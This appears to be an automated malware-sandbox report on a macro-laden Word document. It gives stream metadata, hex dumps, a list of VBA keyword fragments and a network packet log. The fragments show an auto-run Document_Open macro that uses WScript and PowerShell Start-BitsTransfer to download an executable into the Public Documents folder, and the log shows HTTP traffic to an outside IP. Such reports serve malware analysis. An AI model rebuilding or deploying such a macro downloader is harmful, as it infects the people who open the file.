Create Time:	2021-06-10 08:54:00
Last Saved Time:	2021-06-10 08:55:00
Number of Pages:	1
Number of Words:	0
Number of Characters:	1
Creating Application:	Microsoft Office Word
Security:	0

Document Summary
Document Code Page:	1252
Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	983040

Streams with VBA

VBA File Name: Module1.bas, Stream Size: 993

General
Stream Path:	Macros/VBA/Module1
VBA File Name:	Module1.bas
Stream Size:	993
Data ASCII:	. . . . . . . . . z . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 ab 34 9c e4 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
physicaldark()
Attribute
VB_Name
Macro
physicaldark

VBA Code

VBA File Name: ThisDocument.cls, Stream Size: 1786

General
Stream Path:	Macros/VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	1786
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . . . . . . . . . . . 4 . G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 04 03 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff 0b 03 00 00 2b 05 00 00 00 00 00 00 01 00 00 00 ab 34 d7 47 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
";C:\Users\Public\Documents\nothinglittle.ex"
-Destination
"C:\Users\Public\Documents\nothinglittle.ex"
VB_Name
VB_Creatable
CreateObject("wscript.s"
VB_Exposed
calllife).Run(insidewith
rememberhead
Start-Bit"
"hell"
VB_Customizable
-Source
"Transfer
insidewith
Document_Open()
VB_TemplateDerived
"ThisDocument"
False
Attribute
Private
VB_PredeclaredId
VB_GlobalNameSpace
"powers"
VB_Base
calllife

VBA Code

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	114
Entropy:	4.2359563651
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.243799209562
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.45311151175
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D e l l . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 6987

General
Stream Path:	1Table
File Type:	data
Stream Size:	6987
Entropy:	5.8885032044
Base64 Encoded:	True
Data ASCII:	. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw:	0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Data, File Type: data, Stream Size: 392814

General
Stream Path:	Data
File Type:	data
Stream Size:	392814
Entropy:	7.9926896989
Base64 Encoded:	True
Data ASCII:	n . . . D . d . . . . . . . . . . . . . . . . . . . . . . . x " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . J . . . . . . . . . . . . . . . . . . . C . . . & . . . . A . . . . . . . . . . . . . . . . . . . . . . 0 . 1 . 0 . 1 . 0 . 1 . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . = . . . z . . . . . . . . . . . . . . D . . . . . . . . n . . . . . . . . . . . . . = . . . z . . . . . . P N G . . . . . . . . I H D R . . . . . . . L . . . . . } . . . . . . .
Data Raw:	6e fe 05 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 8b 2e 78 22 11 03 11 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 4a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 26 00 00 00 04 41 01 00 00 00 05 c1 0e 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 30 00 31 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 410

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	410
Entropy:	5.35778177907
Base64 Encoded:	True
Data ASCII:	I D = " { 5 D 6 5 F 4 3 D - 2 7 0 A - 4 8 3 B - 8 F A 4 - C B 6 D D 3 F 5 B D 6 D } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 B 2 9 0 B 6 A 2 A 6 E 2 A 6 E 2 A 6 E 2 A 6 E " . . D P B = " 4 E 4 C 6 E 4 F B 2 5 1 D 4 5 2 D 4 5 2 D 4 " . . G C = " 7 1 7 3 5 1 9 2 5 2 9 2 5 2 6 D " . . . . [ H o s t
Data Raw:	49 44 3d 22 7b 35 44 36 35 46 34 33 44 2d 32 37 30 41 2d 34 38 33 42 2d 38 46 41 34 2d 43 42 36 44 44 33 46 35 42 44 36 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 65

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	65
Entropy:	3.27802992751
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2592

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	2592
Entropy:	4.11036825962
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
Data Raw:	cc 61 a6 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 562

General
Stream Path:	Macros/VBA/dir
File Type:	data
Stream Size:	562
Entropy:	6.329417886
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . Y . . b . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . X . m . .
Data Raw:	01 2e b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 59 e9 b6 62 0b 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Stream Path: WordDocument, File Type: data, Stream Size: 4096

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	4096
Entropy:	1.04528425699
Base64 Encoded:	False
Data ASCII:	. . . . Y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j [ . [ . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . . \\ 9 . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	ec a5 c1 00 59 e0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 62 6a 62 6a 5b c9 5b c9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 39 a3 0a 5c 39 a3 0a 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 11, 2021 07:41:48.519517899 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.571166992 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.571353912 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.573122978 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.625103951 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.669747114 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.725075006 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.725127935 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.725167990 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.725207090 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.725215912 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.725250959 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.775830030 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.775949001 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.776024103 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.776035070 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.776088953 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.776143074 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.776206017 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.776279926 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.776340961 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.776391983 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.776457071 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.776510000 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.826922894 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.826953888 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.826972961 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.826992035 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.827016115 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.827045918 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.827079058 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.827105999 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.827137947 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.827161074 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.827186108 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.827208042 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.827225924 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.827231884 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.827245951 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.827250004 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.827266932 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.827286959 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.827296019 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.827307940 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.827328920 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.827368021 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.827418089 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.878262043 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878289938 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878305912 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878321886 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878336906 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878353119 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878369093 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878386021 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878407001 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878418922 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.878423929 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878442049 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878459930 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878470898 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.878477097 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878493071 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878503084 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.878509045 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878537893 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.878561974 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878562927 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.878603935 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878617048 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.878643990 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878706932 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.878736973 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878753901 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878803968 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878813028 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.878870010 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878894091 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878916025 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878930092 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.878940105 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878964901 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.878988028 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.879009008 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.879019022 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.879031897 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.879053116 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.879071951 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.879086971 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.879096985 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.879125118 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.879167080 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.879220963 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.929886103 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.929951906 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.929989100 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930022955 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930056095 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:48.930078983 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:48.930089951 CEST	80	49728	31.210.20.45	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 11, 2021 07:41:10.832798004 CEST	64938	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:10.883836031 CEST	53	64938	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:11.722973108 CEST	60152	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:11.775981903 CEST	53	60152	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:12.809017897 CEST	57544	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:12.860456944 CEST	53	57544	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:13.750332117 CEST	55984	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:13.800266027 CEST	53	55984	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:14.985160112 CEST	64185	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:15.035154104 CEST	53	64185	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:15.960246086 CEST	65110	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:16.014609098 CEST	53	65110	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:16.748366117 CEST	58361	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:16.854274035 CEST	53	58361	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:17.449394941 CEST	63492	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:17.527631998 CEST	53	63492	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:18.488331079 CEST	63492	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:18.551199913 CEST	53	63492	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:19.488365889 CEST	63492	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:19.574156046 CEST	53	63492	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:20.700575113 CEST	60831	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:20.753508091 CEST	53	60831	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:21.535720110 CEST	63492	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:21.597326994 CEST	53	63492	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:21.631319046 CEST	60100	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:21.684258938 CEST	53	60100	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:23.403966904 CEST	53195	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:23.462760925 CEST	53	53195	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:24.403342009 CEST	50141	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:24.454746008 CEST	53	50141	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:25.485156059 CEST	53023	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:25.544076920 CEST	53	53023	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:25.582359076 CEST	63492	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:25.645179033 CEST	53	63492	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:26.562211990 CEST	49563	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:26.612839937 CEST	53	49563	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:27.554721117 CEST	51352	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:27.605020046 CEST	53	51352	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:28.463372946 CEST	59349	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:28.515290022 CEST	53	59349	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:30.122205973 CEST	57084	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:30.182354927 CEST	53	57084	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:33.636338949 CEST	58823	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:33.688656092 CEST	53	58823	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:34.515969038 CEST	57568	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:34.566216946 CEST	53	57568	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:40.811451912 CEST	50540	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:40.873195887 CEST	53	50540	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:47.167042017 CEST	54366	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:47.246959925 CEST	53	54366	8.8.8.8	192.168.2.3
Jun 11, 2021 07:42:04.075032949 CEST	53034	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:42:04.137747049 CEST	53	53034	8.8.8.8	192.168.2.3
